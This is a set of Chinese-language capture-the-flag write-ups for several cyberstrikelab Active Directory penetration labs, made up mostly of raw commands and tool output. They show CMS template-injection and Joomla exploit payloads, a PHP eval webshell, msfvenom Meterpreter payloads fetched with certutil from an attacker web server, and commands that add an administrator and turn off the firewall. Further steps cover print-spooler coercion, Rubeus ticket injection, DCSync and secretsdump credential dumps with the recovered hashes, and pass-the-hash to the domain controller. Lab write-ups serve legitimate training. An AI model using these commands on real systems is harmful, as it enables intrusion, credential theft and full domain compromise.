'dc.ccache' [*] Trying to retrieve NT hash for 'dc$' [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:88 ... OK [*] Got hash for 'dc$@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa 参数来源/原因作用auth子命令使用证书进行Kerberos认证-pfx dc.pfx上一步生成包含私钥的证书文件-debug调试选项显示详细过程信息认证过程:证书提交:向域控(10.6.6.55)提交dc.pfx证书身份验证:证书证明申请者是DC$(域控制器机器账户)TGT获取:成功获取DC$的Kerberos票证授予票证(TGT)哈希提取:从TGT中提取DC$的NTLM哈希3.2.5 获取NTLM哈希用域控的机器账号 dc$ 的 NT 哈希,进行 Pass-the-Hash 身份验证,尝试从域控中提取所有域用户的凭据信息(如 NTLM 哈希等)。┌──(root㉿kali)-[/data/demo] └─# proxychains impacket-secretsdump cyberstrikelab.com/dc\$@10.6.6.55 -hashes aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 [proxychains] DLL init: proxychains-ng 4.17 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:445 ... OK [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.6.6.55:49669 ... OK Administrator:500:aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:416f4ea64c9c73ad29a4a69dcee5d8ca::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: cyberstrikelab.com\cslab:1104:aad3b435b51404eeaad3b435b51404ee:39b0e84f13872f51efb3b8ba5018c517::: DC$:1000:aad3b435b51404eeaad3b435b51404ee:97dc9f3da91660041ff88c17c8bbe7aa::: CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:7e5d2858c617c4ccf32b28241dc5b8b2::: tmpuser$:1105:aad3b435b51404eeaad3b435b51404ee:6fe8e4da8776622663eed7aba05de2f7::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:8583c13a9eca67e085ff0b68af74316bef0ebd3fb197bb235b76cbb72358f2ef Administrator:aes128-cts-hmac-sha1-96:6012285d474e3b60086965219ac7e31c Administrator:des-cbc-md5:208fc8f42fae3132 krbtgt:aes256-cts-hmac-sha1-96:0b820697b640266ced6843c4041131c1e3750000e00d47c0c597a82547927337 krbtgt:aes128-cts-hmac-sha1-96:c8f683e4cf2033fd75416667670e13bb krbtgt:des-cbc-md5:23dc674a76bf7adc cyberstrikelab.com\cslab:aes256-cts-hmac-sha1-96:34439b0bf9f6e1bf57d4d859215ed387a9c75e944ac053ddd1bc2f1e5b162048 cyberstrikelab.com\cslab:aes128-cts-hmac-sha1-96:84a132b5db39e2e652c08b8148fecb00 cyberstrikelab.com\cslab:des-cbc-md5:46f457ef2aad0e08 DC$:aes256-cts-hmac-sha1-96:2292c30804bdf9a61d170f48d38b30d3f843bb8310677ac7116e925f663edcbd DC$:aes128-cts-hmac-sha1-96:b583afdc96a04ec0ceda8dffdfa2e883 DC$:des-cbc-md5:a75801e31943a2dc CYBERWEB$:aes256-cts-hmac-sha1-96:c0418d75b0ef82607eadcd0f4793441aa17fc71df788e83a531ae87ce2cc92d9 CYBERWEB$:aes128-cts-hmac-sha1-96:3c602f53a3722c0a602a5adf2114354a CYBERWEB$:des-cbc-md5:6d5dd3261f38c862 tmpuser$:aes256-cts-hmac-sha1-96:952c1a920206e3a5852ea56dfdde77acb8270bf12628c29a7f702a9cdc8fb081 tmpuser$:aes128-cts-hmac-sha1-96:1174b1ae9d7f4b04fd5eef81bcbd2144 tmpuser$:des-cbc-md5:795d80ec58cdd5a8 [*] Cleaning up... 参数来源/原因作用impacket-secretsdump工具选择远程提取密码哈希的工具cyberstrikelab.com/dc\$@10.6.6.55目标指定使用dc$账户连接域控-hashes ...上一步获得提供dc$的LM和NTLM哈希dc\$中的\Shell转义防止$被Shell解释为变量3.2.6 PTHPTH,拿下域控,在根目录获取最后的flag┌──(root㉿kali)-[/data/demo] └─# proxychains impacket-psexec -hashes :28cfbc91020438f2a064a63fff9871fa cyberstrikelab.com/administrator@10.6.6.55
-
【域渗透】cyberstrikelab-lab8 cyberstrikelab-lab8ZZZCMS目录扫描到后台地址admin弱口令 admin / admin123456发现版本信息 V1.6.1 zzzcms漏洞利用方法https://xz.aliyun.com/news/4103修改内容为{if:assert($_request[phpinfo()])}phpinfo();{end if} 访问你修改的这个页面http://172.50.12.33/search/ 一句话连接不上,那就执行系统命令,找到flag1{if:assert($_request[system($_POST[a])])};{end if} 本机开启http服务生成木马msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 从本机下载木马certutil -urlcache -split -f http://172.16.233.2:8000/shell.exe shell.exe msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 172.50.12.33; set LPORT 4444; exploit -j -z" 执行木马,上线getsystem提权meterpreter > getuid Server username: NT AUTHORITY\NETWORK SERVICE meterpreter > getsystem ...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 上传fscanupload /data/windows_atk/scan_info/fscan.exe 却没有发现另外一台主机C:\phpstudy_pro\WWW\search>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 1: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::b476:ff8c:347:ef73%5 IPv4 Address. . . . . . . . . . . : 172.50.12.33 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 172.50.12.233 Ethernet adapter ��̫��ʵ�� 2: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::47e:778d:c27:a958%4 IPv4 Address. . . . . . . . . . . : 10.5.5.2 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.5.5.1 Tunnel adapter Reusable ISATAP Interface {539A3334-B0ED-49F4-B694-5F6E0A7AB805}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.{4A835BE8-816A-4266-AF10-0ADC1C46A06E}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.2/24 fscan.exe -h 10.5.5.2/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 10.5.5.2 is alive [*] Icmp alive hosts len is: 1 10.5.5.2:3306 open 10.5.5.2:445 open 10.5.5.2:139 open 10.5.5.2:135 open 10.5.5.2:80 open [*] alive ports len is: 5 start vulscan [+] NetInfo: [*]10.5.5.2 [->]WIN-NQOLAOUO8C1 [->]172.50.12.33 [->]10.5.5.2 [*] WebTitle:http://10.5.5.2 code:200 len:20013 title:cyberstrikelabzzzcms 已完成 5/5 [*] 扫描结束,耗时: 18.4658195s 使用命令扫C:\phpstudy_pro\WWW\search>for /l %i in (1,1,255) do @ping 10.5.5.%i -w 1 -n 1 | find /i "ttl" for /l %i in (1,1,255) do @ping 10.5.5.%i -w 1 -n 1 | find /i "ttl" Reply from 10.5.5.2: bytes=32 time<1ms TTL=128 Reply from 10.5.5.33: bytes=32 time=1ms TTL=128 Reply from 10.5.5.66: bytes=32 time=1ms TTL=128 主机33和66存活的,再扫,没有任何内容C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.33 -p 1-65000 fscan.exe -h 10.5.5.33 -p 1-65000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan [*] alive ports len is: 0 start vulscan 已完成 0/0 [*] 扫描结束,耗时: 7.1787098s 设置路由run post/multi/manage/autoroute 使用下面的这些msf模块扫端口都不行scanner/portscan/tcp scanner/portscan/syn 添加一个用户看看什么情况# 创建新用户,并设置密码: net user xiaoyu 123@abc /add # 将新用户添加到管理员组: net localgroup Administrators xiaoyu /add # 关闭Windows防火墙 netsh advfirewall set allprofiles state off # 修改注册表,强制启用远程桌面服务(RDP),允许通过远程桌面(3389端口)连接 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 把360退了,使用远程连接后的cmd扫这样能扫出来,那会不会是系统用户的问题,我提权了,重新反弹shellmsf exploit(multi/handler) > run [*] Started bind TCP handler against 172.50.12.33:4444 [*] Sending stage (177734 bytes) to 172.50.12.33 [*] Meterpreter session 2 opened (10.10.10.173:35111 -> 172.50.12.33:4444) at 2025-12-11 04:32:10 -0500 meterpreter > shell Process 10896 created. Channel 1 created. Microsoft Windows [�汾 10.0.14393] (c) 2016 Microsoft Corporation����������Ȩ���� C:\phpstudy_pro\WWW\search>chcp 65001 chcp 65001 Active code page: 65001 C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.2/24 fscan.exe -h 10.5.5.2/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan (icmp) Target 10.5.5.2 is alive (icmp) Target 10.5.5.33 is alive (icmp) Target 10.5.5.66 is alive [*] Icmp alive hosts len is: 3 10.5.5.66:88 open 10.5.5.2:3306 open 10.5.5.66:445 open 10.5.5.33:445 open 10.5.5.2:445 open 10.5.5.66:139 open 10.5.5.33:139 open 10.5.5.2:139 open 10.5.5.33:135 open 10.5.5.2:135 open 10.5.5.2:80 open 10.5.5.66:135 open [*] alive ports len is: 12 start vulscan [*] NetInfo [*]10.5.5.2 [->]WIN-NQOLAOUO8C1 [->]172.50.12.33 [->]10.5.5.2 [*] NetInfo [*]10.5.5.33 [->]cyberweb [->]10.5.5.33 [*] NetInfo [*]10.5.5.66 [->]DC [->]10.5.5.66 [*] WebTitle http://10.5.5.2 code:200 len:20013 title:cyberstrikelabzzzcms [*] OsInfo 10.5.5.66 (Windows Server 2012 R2 Standard 9600) [*] OsInfo 10.5.5.33 (Windows Server 2016 Standard 14393) [*] NetBios 10.5.5.33 cyberweb.cyberstrikelab.com Windows Server 2016 Standard 14393 已完成 12/12 [*] 扫描结束,耗时: 8.5703463s 看来就是这个问题,重新设置路由run post/multi/manage/autoroute 设置代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j fscan.exe -h 10.5.5.33 -p 1-10000C:\phpstudy_pro\WWW\search>fscan.exe -h 10.5.5.33 -p 1-10000 fscan.exe -h 10.5.5.33 -p 1-10000 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.4 start infoscan 10.5.5.33:445 open 10.5.5.33:139 open 10.5.5.33:135 open 10.5.5.33:3389 open 10.5.5.33:5985 open [*] alive ports len is: 5 start vulscan [*] NetInfo [*]10.5.5.33 [->]cyberweb [->]10.5.5.33 [*] NetBios 10.5.5.33 cyberweb.cyberstrikelab.com Windows Server 2016 Standard 14393 [*] OsInfo 10.5.5.33 (Windows Server 2016 Standard 14393) [*] WebTitle http://10.5.5.33:5985 code:404 len:315 title:Not Found 已完成 4/5 [-] (58/210) rdp 10.5.5.33:3389 administrator Aa123456 remote error: tls: access denied 已完成 4/5 [-] (118/210) rdp 10.5.5.33:3389 admin abc123456 remote error: tls: access denied 已完成 4/5 [-] (178/210) rdp 10.5.5.33:3389 guest 666666 remote error: tls: access denied 已完成 5/5 [*] 扫描结束,耗时: 3m59.4511788s 扫到3389端口,试试能不能爆破出密码,admin@123456把目录传进去,要把马传进去proxychains rdesktop 10.5.5.33 -r disk:shell=/data/demo 传shellmsf开启监听,上线use exploit/multi/handler set PAYLOAD windows/meterpreter/bind_tcp set RHOST 10.5.5.33 set LPORT 4444 非约束委派相关文章学习连接:https://forum.butian.net/share/1591可能是环境出问题了(排除版本问题,我切换了多个AdFind版本),一直凭据出错,不能正常执行命令,拿到了33的系统权限也是一样,添加管理员账户执行AdFind照样错误,下面图来自网上这里的图来自 https://www.hyhforever.top/posts/2025/07/cyberstrikelab-lab8/# ADFind查询非约束委派账户 AdFind.exe -b "DC=cyberstrikelab,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn # 使用Rubeus监听来自域控的票据 Rubeus.exe monitor /interval:2 /filteruser:DC$ 利用打印机漏洞(SpoolSample)或类似攻击让域控主动连接非约束委派机器,从而生成并发送Kerberos票据给攻击者控制机器。# 强制回连,获得域控机器账户的TGT shell SpoolSample.exe DC CYBERWEB # rubeus导入票据 Rubeus.exe ptt /ticket:doIFtDCCBbCgAwIBBaEDAgEWooIErDCCBKhhggSkMIIEoKADAgEFoRQbEkNZQkVSU1RSSUtFTEFCLkNPTaInMCWgAwIBAqEeMBwbBmtyYnRndBsSQ1lCRVJTVFJJS0VMQUIuQ09No4IEWDCCBFSgAwIBEqEDAgECooIERgSCBELeAgo8gfc1sOmVFHxh23jlld/MeJN/NEYNWOVmXG7H6J6jeQH/ux0qR9NhB8XEHpISi/k+m+d3MgVV9I97HPHPGpxMwwPwn283E5+JQBdhYK/Vq7eQhQScpw0+uojOX8Clvw/YjIv8V1G1Kqxyj+EbWm07KVjefQHMeuclOII27ZclrWuVxNQ1GI2GV+nLVrRMgGlKmh9FTnLKacg3lGZutWuUS1pU3OWc7Q0wClL6MeczUq378IMB3G4Vv3cAR8mY/niULKswPfzVbe6oeuvAIOpHHV6qoB631NiF48twHG78uZ+ExiVIU9p1juR7IL053H0LOSRTV/behPNz8c/mhcxCWDfXVEAn1gbibwUvrBSCiNP6hp234Qa4pbEB8PTlxXc0QYxQVF8VC+btIxx93APc+/W6wBzxPr65IIqlhlbV1NdUCIF2SGqliyHUdOIRF9llx52RaTsYhzX4D5Hsqoh8YLIs52q7o9gy6yyJi69qADD4jpmvC6exzl0l40qd+csY8vfb2Ojm5fwgNn1oDLWRxjPriEGQNSFIxBuDF4BD3lzWcQFbTsuBYl0a7NBXeFHFWwnDRoQrdO6UHSDcpJt0WRvo+8S+sr14PvTITr6BWeKafeBy/Ve+iovAFCZo7DbAUISpPxYdpIjUzIpfm7ZMLT015MGNYB16PhNvUL3tfavikHed87lgfvTs429bSOcYP1U1YnT8/z2TrIMuuKpvjyNq9cZmZeLsS9SnNCwiFartRSephd587X5ERqsg0ai/i87lWJCBCQ15a9LapH5vxYvnkHljhvT3/5Vo9RYfGiJbdEtxG1vR17LsGCV05ROpf8L0Fa0CdWXB84MSzXjoIySIRV9zAvvcsTfu+r6oTT7QL9ciG8FvaHY2Gtf32FlFOfVLdoy1B63d0nYoKoZmm09ImIFFjKV0871uhQ3po3nu1vVvJkiRHM7hVwhK9h9aHTtYahuig1z6oxqYVMsubnYlrUKIPKe6O/qTBSaJoH03cXnWYUxrObv5A5ekiIG6zuHsqmGaDXWZV/5SfB4DaztwJZHzvYwuCYsSR6IV2vWW4st9ONoWkzg08XXjvVoEqfqlpTs2WjxAPaK1kY8oIp7SHJ7DVovFnkf7puFHGbJ/wBCpdR61Pl1qj/ntuv1OVdRRb71DfTZHjmV4rXISZ3cjwAJTgKqlIUzzrkiTsmTrtk92z3eIfm9EE4NqkOJWmxd9sXhC58W4CVFnZXZ7A4BqiBctRX/ZMXLcz++55SqSLTg8Xbm01EXTVnQHU6XTdOPs+4ZRrXEo+r8I+hT0aQegwcDCCt1WseFh92ut06Y1zfyNcxcffBZPB3UA0Te49BxN493RdwbUw4RIObPUoucAW4r7i0p6Nk0MxXt+nnYHuKesYu+GhOStENyVjmbIcSLqd4cJNrBAX3cNZmCtSFGSuKahub4Lb7k0WoRZo4HzMIHwoAMCAQCigegEgeV9geIwgd+ggdwwgdkwgdagKzApoAMCARKhIgQgo+1mN3aSVBbGT0Sp9kwHxXFCpO+xUDGciGtbd189KomhFBsSQ1lCRVJTVFJJS0VMQUIuQ09NohAwDqADAgEBoQcwBRsDREMkowcDBQBgoQAApREYDzIwMjUwNTI1MDUwNDQwWqYRGA8yMDI1MDUyNTE1MDQ0MFqnERgPMjAyNTA2MDEwNTA0NDBaqBQbEkNZQkVSU1RSSUtFTEFCLkNPTaknMCWgAwIBAqEeMBwbBmtyYnRndBsSQ1lCRVJTVFJJS0VMQUIuQ09N # mimikatz导出域内用户Hash mimikatz.exe "lsadump::dcsync /domain:cyberstrikelab.com /user:cyberstrikelab\Administrator" "exit" # PTH proxychains impacket-psexec -hashes :9d880175be3fc0e75ebb9686f482cfa5 cyberstrike.com/administrator@10.5.5.66 相关解释AdFind.exe这是一款免费的命令行工具,用于在AD域中执行查询域内信息,AD对象,LDAP协议交互情况,域内权限分析,以及域环境侦察,例如# 查询域中所有用户 AdFind.exe -f "(objectcategory=person)" dn # 查询不要求Kerberos预身份认证的用户(用于安全审计) AdFind.exe -b "dc=example,dc=com" -f "(&(samaccounttype=805306369)(useraccountcontrol:1.2.840.113556.1.4.803:=4194304))" # 获取域控制器信息 AdFind.exe -d domain.com -u username -p password -b "dc=domain,dc=com" -s base objectClass 详细的使用可以参考官方手册,百度一下,你就知道
-
【域渗透】cyberstrikelab-lab6 cyberstrikelab-lab6第一台目录扫描到administrator后台地址apt install joomscan joomscan -u http://192.168.10.10/ # 扫出结果Joomla版本3.4.6 [+] Detecting Joomla Version [++] Joomla 3.4.6 exp获取searchsploit Joomla 3.4.6 searchsploit -m 47524 使用┌──(root㉿kali)-[/data/demo] └─# python 47465.py -t http://192.168.10.10/ -e [*] Getting Session Cookie .. [*] Getting CSRF Token .. [*] Sending request .. [+] Vulnerable [*] Getting Session Cookie .. [*] Getting CSRF Token .. [*] Sending request .. [+] Backdoor implanted, eval your code at http://192.168.10.10//configuration.php in a POST with khacpsczesvgcaeqwadfazwmljdlcqqrkqezpuyedrwcsfjqqm [*] Now it's time to reverse, trying with a system + perl 得到密码khacpsczesvgcaeqwadfazwmljdlcqqrkqezpuyedrwcsfjqqm蚁剑连接生成马,蚁剑上传msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe kalimsfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/bind_tcp; set RHOST 192.168.10.10; set LPORT 4444; exploit -j -z" 获取正向shell,蚁剑执行exeshell.exe 得到第一台机器shell这台机器没有第二章网卡C:\WWW>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::71b1:e5e:d78d:3036%7 IPv4 Address. . . . . . . . . . . : 192.168.10.10 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Tunnel adapter isatap.{99805FC6-03F4-4415-8F77-D4C935988DCA}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : C:\WWW>fscan.exe -h 192.168.10.10/24 fscan.exe -h 192.168.10.10/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.10.10 is alive (icmp) Target 192.168.10.20 is alive (icmp) Target 192.168.10.233 is alive [*] Icmp alive hosts len is: 3 192.168.10.233:8080 open 192.168.10.20:7001 open 192.168.10.10:3306 open 192.168.10.20:445 open 192.168.10.10:445 open 192.168.10.20:139 open 192.168.10.10:139 open 192.168.10.20:135 open 192.168.10.10:135 open 192.168.10.10:80 open 192.168.10.233:22 open [*] alive ports len is: 11 start vulscan [+] NetInfo: [*]192.168.10.10 [->]WIN-P5ECGG92B08 [->]192.168.10.10 [*] 192.168.10.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600 [*] WebTitle:https://192.168.10.233:8080 code:404 len:19 title:None [*] WebTitle:http://192.168.10.10 code:200 len:6060 title:Home [*] WebTitle:http://192.168.10.20:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://192.168.10.20:7001 [weblogic] 已完成 10/11 [-] ssh 192.168.10.233:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 10/11 [-] ssh 192.168.10.233:22 root system ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 10/11 [-] ssh 192.168.10.233:22 admin admin#123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 10/11 [-] ssh 192.168.10.233:22 admin a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain 已完成 11/11 [*] 扫描结束,耗时: 4m39.975774s 第二台fscan扫描出来的192.168.10.20:7001 weblogic第二个flag第三台传马上线msf,msf注意修改ip,因为我们是正向连接certutil -urlcache -split -f http://172.16.233.2:8000/shell.exe shell.exe 上传fscanupload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 发现另外一张网卡C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>ipconfig ipconfig Windows IP Configuration Ethernet adapter ��̫�� 3: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::e9e1:6372:ae05:ecf0%17 IPv4 Address. . . . . . . . . . . : 192.168.10.20 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.10.233 Ethernet adapter ��̫��ʵ�� 0: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::3d2f:f957:5cf8:220f%16 IPv4 Address. . . . . . . . . . . : 192.168.20.20 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.20.1 Tunnel adapter isatap.{1342B97A-CC27-446C-9089-7A3F3210BB09}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : Tunnel adapter isatap.{56056A50-6E34-40E7-805D-8B35838D77D9}: Media State . . . . . . . . . . . : Media disconnected Connection-specific DNS Suffix . : 扫另外一张网卡,发现第三台主机30C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>fscan.exe -h 192.168.20.20 fscan.exe -h 192.168.20.20 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.20 is alive [*] Icmp alive hosts len is: 1 192.168.20.20:7001 open 192.168.20.20:445 open 192.168.20.20:139 open 192.168.20.20:135 open [*] alive ports len is: 4 start vulscan [*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600 [*] WebTitle:http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://192.168.20.20:7001 [weblogic] [+] http://192.168.20.20:7001 poc-yaml-weblogic-cve-2019-2725 v12 已完成 4/4 [*] 扫描结束,耗时: 9.7411266s C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain>fscan.exe -h 192.168.20.20/24 fscan.exe -h 192.168.20.20/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.1 start infoscan (icmp) Target 192.168.20.20 is alive (icmp) Target 192.168.20.30 is alive [*] Icmp alive hosts len is: 2 192.168.20.30:88 open 192.168.20.20:7001 open 192.168.20.30:445 open 192.168.20.20:445 open 192.168.20.30:139 open 192.168.20.20:139 open 192.168.20.30:135 open 192.168.20.20:135 open 192.168.20.30:80 open [*] alive ports len is: 9 start vulscan [*] 192.168.20.20 CYBERSTRIKELAB\CYBERWEB Windows Server 2012 R2 Standard 9600 [+] NetInfo: [*]192.168.20.30 [->]WIN-9DJ4TH21IE9 [->]192.168.20.30 [+] 192.168.20.30 MS17-010 (Windows Server 2016 Standard 14393) [*] 192.168.20.30 [+]DC CYBERSTRIKELAB\WIN-9DJ4TH21IE9 Windows Server 2016 Standard 14393 [*] WebTitle:http://192.168.20.30 code:200 len:703 title:IIS Windows Server [+] http://192.168.20.30 poc-yaml-active-directory-certsrv-detect [*] WebTitle:http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found [+] InfoScan:http://192.168.20.20:7001 [weblogic] [+] http://192.168.20.20:7001 poc-yaml-weblogic-cve-2020-14750 [+] http://192.168.20.20:7001 poc-yaml-weblogic-cve-2019-2725 v12 已完成 9/9 [*] 扫描结束,耗时: 17.9561302s 发现ms17-010漏洞,使用命令执行得到最后一个flaggo-flag{kqqjRIRRoiJO5JIm}
-
【域渗透】cyberstrikelab-lab3 cyberstrikelab-lab3web信息收集端口扫描nmap -sT -Pn -p- 192.168.10.10 -T4 3590端口开启是一个web应用扫描出来了一个访问看看是一个登录框查看登录界面的网页源码登录进来看到版本信息使用万能的搜索引擎看到这里有一个本地文件泄露漏洞找到第一个flag另外还发现能在web目录写入文件,我们写入一句话<?php @eval($_POST['cmd']);?> 蚁剑连接msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.10.173 LPORT=4444 -f exe -o shell.exe 内网渗透上线msf直接就是系统权限查找fscanfind / -name "fscan.exe" 2>/dev/null 利用meterpreter模块上传upload /data/CS/Cobalt_Strike_4.7/plugin/TaoWu/script/x64/fscan.exe 看到有双网卡fscan扫描另一张网卡,发现192.168.20.20和192.168.20.30靶机,其中30是域控主机使用fscan扫描第一台机器的端口添加路由run post/multi/manage/autoroute 配置代理use auxiliary/server/socks_proxy set VERSION 5 set SRVPORT 1080 run -j 修改代理vi /etc/proxychains4.conf 访问到thinkphp站从flag中可以看到木马在主页使用awBruter密码爆破工具,爆破出来密码是admin123蚁剑设置好代理使用密码连接找到第二个flag拿下系统权限域渗透之后就可以上传msf马,如果蚁剑不行的话(这个环境可能有一点问题,第二台机器老是断网)那就使用windows的远程连接上传到10.10,然后再利用windows自带的远程连接传20.20机器(前提是创建了一个远程连接用户),往期很多文章都写过,之后利用msf抓取hash或者使用猕猴桃抓取哈希,使用hash传递攻击proxychains impacket-psexec -hashes :f349636281150c001081894de72b4e2b cyberstrikelab.com/administrator@192.168.20.30
